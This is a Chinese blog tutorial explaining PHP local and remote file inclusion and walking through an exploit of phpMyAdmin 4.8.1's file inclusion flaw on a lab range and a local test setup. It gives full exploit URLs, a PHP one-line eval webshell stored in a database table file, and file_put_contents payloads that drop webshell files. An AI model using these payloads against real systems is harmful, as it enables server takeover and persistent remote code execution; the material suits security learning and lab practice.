本地文件包含和远程文件包含(超详细,小白也彳亍!)

最新推荐文章于 2023-09-12 16:58:40 发布
最新推荐文章于 2023-09-12 16:58:40 发布
阅读量1.1w 收藏 58
点赞数 21
分类专栏: 笔记 文章标签: 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/108724251
版权

在这里插入图片描述
在这里插入图片描述

为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。
在这里插入图片描述
如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然是不影响其他功能的执行,比如这里的nf和123的输出。那么就表明include函数,如果出现错误的话,并不会影响其他功能的运行。
在这里插入图片描述

如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,影响后面功能的执行,比如这里的nf的输出,后面的功能因为2.txt报错,导致123未执行。那么就表明require函数,如果出现错误的话,会影响后面功能的运行。
在这里插入图片描述
只要文件内是php代码,文件包含是不在意文件后缀的。
在这里插入图片描述
12345.jpg的传参值是a,那么我们可以写传参值=file_put_contents(‘8.php’,’<?php eval($_REQUEST[a]);?>’)
然后生成一个新的php文件

在这里插入图片描述
访问index.php
在这里插入图片描述

以上我们接触的全部是本地文件包含

说了本地文件包含,我们再来看远程文件包含

简单来说远程文件包含,就是可以包含其他主机上的文件,并当成php代码执行。
要实现远程文件包含的话,php配置的allow_url_include = on必须为on(开启)
来我们可以来实验一下,把这个配置打开。
“其他选项菜单”——“打开配置文件”——“php-ini”
在这里插入图片描述
打开配置文件,搜索allow_url_include 把Off改为On,注:第一个字母要为大写
在这里插入图片描述
之后要重启才能生效。
在这里插入图片描述
配置开启后,我们来远程文件包含一下,我们来远程包含一下kali上的1.txt,可以看到没有本地包含,所以直接显示的内容。

在这里插入图片描述
在这里插入图片描述
那我们现在来远程包含一下kali的这个1.txt,看会不会有phpinfo,注意我这里是index文件哦,所以是默认的。
在这里插入图片描述

可以看到,包含成功!

在这里插入图片描述
这里可以插一句题外话,如果是window服务器的话,可以让本地文件包含变成远程文件包含。需要开始XX配置,SMB服务。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里我们可以发现,进入一个不存在的目录,然后再返回上一级,相当于没变目录位置,这个是不影响的,而且这个不存在的目录随便怎么写都可以。
在这里插入图片描述
但是php是非常严格的,进入一个不存在的目录,这里目录的名字里不能有?*号,否则报错,然后再返回上一级,相当于没变目录位置,这个是不影响的,而且这个不存在的目录随便怎么写都可以。
在这里插入图片描述

实战

在这里插入图片描述

注意,这里php版本过低,会安装不上

在这里插入图片描述

在这里插入图片描述
安装好后,我们来解析下源码
在这里插入图片描述

在这里插入图片描述1.txt内容phpinfo()
在这里插入图片描述

来本地文件包含一下,发现成功

http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/../11.txt
在这里插入图片描述

靶场 http://59.63.200.79:8010/lfi/phpmyadmin/

先创建一个库名:nf
在这里插入图片描述

接着创建表:ff,字段数选2个就行了
在这里插入图片描述

然后选中我们之前创建好的库名和表名,开始写入数据,第一个就写个一句话木马,第二个随便填充。

在这里插入图片描述

然后我们找到存放表的路径。

在这里插入图片描述
这里我们要传参2个,那么就加上&这里我们找到之后传参phpinfo

http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/…/phpstudy/mysql/data/nf/ff.frm&a=phpinfo();

因为a在ff.frm里

<?php eval($_REQUEST[a])?>注意,这里面没有分号和单引号

文件包含成功

在这里插入图片描述

用file_put_contents(‘8.php’,’<?php eval($_REQUEST[a]);?>’)写入一句话木马

http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/…/phpstudy/mysql/data/nf/ff.frm&a=file_put_contents(‘8.php’,’<?php eval($_REQUEST[a])?>’);

<?php eval($_REQUEST[a])?>注意,这里面没有分号和单引号

在这里插入图片描述
写入成功后,我们连接这个8.php的木马。

http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/8.php

在这里插入图片描述

在线测试时这样,但是我在本地测试的时候,还是有点不一样的。我就直接上不一样的地方,前面的地方都是一样的

1,创建一个库为yingqian1984,
2,创建一个表为yq1984
3,填充表数据,因为跟上面一样,2个字段一个木马,一个随便数据
4,找数据表的位置,最后我发现我的MySQL存放数据库的地方是在
C:\ProgramData\MySQL\MySQL Server 5.7\Data\yingqian1984
在这里插入图片描述

文件包含成功。

http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/ProgramData/MySQL/MySQL Server 5.7/Data/yingqian1984/qy1984.frm&a=phpinfo();

在这里插入图片描述

用file_put_contents(‘9.php’,’<?php eval($_REQUEST[a]);?>’)写入一句话木马

http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/ProgramData/MySQL/MySQL Server 5.7/Data/yingqian1984/qy1984.frm&a=file_put_contents(‘9.php’,’<?php eval($_REQUEST[a])?>’);

<?php eval($_REQUEST[a])?>注意,这里面没有分号和单引号

在这里插入图片描述

传参成功

http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/9.php?a=phpinfo();

在这里插入图片描述

樱浅沐冰
关注
  • 21
    点赞
  • 58
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
china.js,中国地图文件
08-18
china.js,中国地图文件
服务器端文件包含,btslab全攻略——注入之远程文件包含&服务器端包含
weixin_31185473的博客
08-09 413
之前做btslab的时候就想找篇完整教程来对照学习的,可是发现网上只有xss部分,并无完整攻略,所以就自己单独完成了btslab,整体感觉还是比较容易,不过对于新手还是很不错,可以学到很多漏洞知识与代码审计,为了造福刚入门或是想入门的新手,我打算开始出一系列教程,全面介绍btslab(尊重作者劳动成果,转载需注明出处,否则必究)一、远程文件包含在开发程序时,通常会将某些重复使用的函数,频繁使用的功...
iwebsec靶场 文件包含漏洞通关笔记4-远程文件包含
mooyuan的博客
09-12 274
远程文件包含文件包含漏洞的其中一种。这种漏洞在文件的URI位于其他服务器上并作为参数传递给PHP函数“include”,“include_once”,“require”,或“require_once”的情况下可能会出现。
拼图的EXE文件
01-12
拼图 原创 游戏 using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; namespace WindowsFormsApplication1 { public partial class Form1 : Form { Random r = new Random();//随机种子 Point pi = new Point();//出界返回 Point[] pt = new Point[8];//判断胜负 string[] st = new string[8];//判断胜负 public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { pictureBox1.Left -= 800; tianjia(); panduan(); } void tianjia()//添加图片 { string si;//获取坐标 int i = 7;//图片数量 int n = 0;//变量 string[] s = { "000000", "000100", "000200", "100000", "100100", "100200", "200000", "200100"}; ComboBox cb = new ComboBox(); ComboBox cc = new ComboBox(); cb.Items.AddRange(s);//确定坐标 cc.Items.AddRange(s);//确定图像 for (n = 0; n < 8; n++) { PictureBox p = new PictureBox();//创建拼图 p.Name = "i" + i; p.Size = new Size(100, 100); p.BackColor = Color.Red; si = cb.Items[r.Next(0,i)].ToString();//打乱拼图坐标 p.Location = new Point(Convert.ToInt32(si) / 1000, Convert.ToInt32(si) % 1000); cb.Items.Remove(si); Bitmap bit = new Bitmap(99, 99);//给拼图添加背景图片 Graphics g = Graphics.FromImage(bit); g.DrawImageUnscaled(pictureBox1.Image, -Convert.ToInt32(cc.Items[i]) / 1000, -Convert.ToInt32(cc.Items[i]) % 1000); p.Image = bit; Controls.Add(p);//把拼图画到窗体上 pt[n] = new Point(Convert.ToInt32(cc.Items[i]) / 1000, Convert.ToInt32(cc.Items[i]) % 1000); st[n] = p.Name; i--; } } private void Form1_KeyPress(object sender, KeyPressEventArgs e) { pi = pictureBox2.Location; string key = e.KeyChar.ToString(); switch (key)//图片移动 { case "w": pictureBox2 .Top -= 100; break; case "s": pictureBox2.Top += 100; break; case "a": pictureBox2.Left -= 100; break; case "d": pictureBox2.Left += 100; break; } if (pictureBox2.Location.X < 0 || pictureBox2.Location.X > 200 || pictureBox2.Location.Y < 0 || pictureBox2.Location.Y > 200) pictureBox2.Location = pi;//判断出界 foreach (Control i in Controls)//反向移动 if (i.Location == pictureBox2.Location&&i.Name!="pictureBox2") { switch (key) { case "w": i.Top += 100; break; case "s": i.Top -= 100; break; case "a": i.Left += 100; break; case "d": i.Left -= 100; break; } } panduan(); } void panduan() { int ai = 0; for (int n = 0; n < 8; n++) foreach (Control i in Controls) if (i.Name == st[n] && i.Location == pt[n]) ai++; label1.Text = ai.ToString(); if (ai == 8) { MessageBox.Show("恭喜你,通关了"); Close(); } } private void button1_Click(object sender, EventArgs e) { if (pictureBox1.Location.X == -800) pictureBox1.Left += 800; else pictureBox1.Left -= 800; } } }
ChiChu-Android:彳亍:一个融合了行走与交友于一体的记录app
05-14
ChiChu-Android 大三上学期与队友 完成的工作室项目 登录界面 四个碎片页面 其他页面
web安全--文件包含(本地包含,远程包含)
nareku的博客
04-05 4092
前言 文件包含漏洞简介: 文件包含的函数的参数没有经过过滤或者是严格的定义,并且参数可以被用户所控制,这样就可能包含非预期的文件。 一.文件包含漏洞常见的函数(默认都以php脚本为准啊) ①include: 包含并运行指定的文件,Include在出错的时候产生警告,脚本会继续运行 ②include_once:在脚本执行期间包含并运行指定文件。该函数和include 函数类似,两者唯一的区别是 使用该函数的时候,php会加检查指定文件是否已经被包含过,如果是,则不会再被包含。 ③require :
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 1981
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1223
Web安全领域的探索之远程文件包含漏洞(LFI)
远程文件包含
Just for fun
10-20 2255
远程文件包含(Remote File Inclusion),简称RFI,与其对应的是本地文件包含(Local File Inclusion,LFI),它们都是通过PHP的包含函数即:require(),require_once(),include()和include_once()来使用。   一般情况下,用户通过包含函数将具有特定功能的函数或类包含到当前脚本中,是没有什么问题的。但是有时候,为...
【web安全】文件包含漏洞
weixin_67259816的博客
05-30 1100
该篇文章主要介绍一下文件包含漏洞的概念,成因,防御手法和一些攻击思路以及攻击方法。
使用SMB共享来绕过php远程文件包含的限制执行RFI的利用
10-16
我们将绕过php远程文件包含的限制,并执行RFI的利用,即使PHP环境被配置为不包含来自远程HTTP/FTP URL的文件。对此文感兴趣的朋友跟随小编一起看看吧
基于深度学习的实时目标检测。包括Windows平台运行演示软件、模型网络和结构、模型推理和封装原始代码。
03-18
基于深度学习的实时目标检测。包括Windows平台运行演示软件、模型网络和结构、模型推理和封装原始代码。主要采用yolov3进行32种常见的目标检测(模型可根据自己的需要进行定制替换,软件和软件源代码可以重复使用)
读取json文件生成菜单,arcgis js api一些常用功能及web开发常用插件
10-28
1,读取json文件生成菜单, 2,arcgis js api地图加载及一些常用功能,, 3,web开发常用插件基本使用:jspanel弹窗插件;datatable数据表格;viewer.js图片查看插件;zTree树插件;Echarts图表插件;
A4打印模板-画图设计设计师产品草稿图纸-网格纸A4打印模板高清待办练字模板PDF下载.pdf
最新发布
04-23
A4打印模板-画图设计设计师产品草稿图纸-网格纸A4打印模板高清待办练字模板PDF下载
ISA-95 流程圣经,描述了PLM企业资源计划、MES制造执行系统、ERP企业资源计划系统、SCM供应链管理系统之间的关系
04-23
ISA-95 流程圣经,描述了PLM企业资源计划、MES制造执行系统、ERP企业资源计划系统、SCM供应链管理系统、客户关系管理CRM之间的关系
年会活动颁奖领奖音乐74首
04-23
颁奖领奖音乐在各种表彰、嘉奖或庆祝场合中扮演着至关重要的角色,其作用主要体现在以下几个方面: 1.营造氛围: 2.情绪引导: 3.节奏控制: 4.品牌塑造: 5.文化表达: 6.致敬与激励: 综上所述,颁奖领奖音乐在颁奖典礼中不仅作为背景音效存在,更是情感传递、氛围营造、流程把控、品牌塑造、文化展现和精神激励的重要载体,对于提升典礼的整体效果和观众体验有着不可忽视的影响。
这个项目是用于个人参加浙江大学移动创新竞赛而使用。.zip
04-23
这个项目是用于个人参加浙江大学移动创新竞赛而使用。
手绘稿模板iphone_x_wireframe_template_-_a4A4打印模板高清待办练字模板PDF下载.pdf
04-23
手绘稿模板iphone_x_wireframe_template_-_a4A4打印模板高清待办练字模板PDF下载
Java基础核心+文件输入流+文件输出流
04-23
使用最简单的输入流和输出流实现 文件复制粘贴功能。这是第二种方式,与第一种方式的不同在于我们使用byte[]数组盛放从myFile读取到字节。比第一种方式,速度会快一些。
pycharm在c盘的缓存文件
07-27
PyCharm 的缓存文件通常位于用户目录下的隐藏文件夹中,而不是直接位于 C 盘。具体来说,对于 Windows 系统,缓存文件位于以下路径: `C:\Users\你的用户名\.PyCharmCE版本号\system\caches` 其中,`你的用户名` 是你登录 Windows 的用户名,而 `版本号` 则是你安装的 PyCharm Community Edition 的版本号。如果你使用的是专业版(Professional Edition),则将 `CE` 替换为 `Professional`。 请注意,如果你在安装 PyCharm 时选择了自定义安装路径,则缓存文件可能位于你指定的路径中,而不是默认路径。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值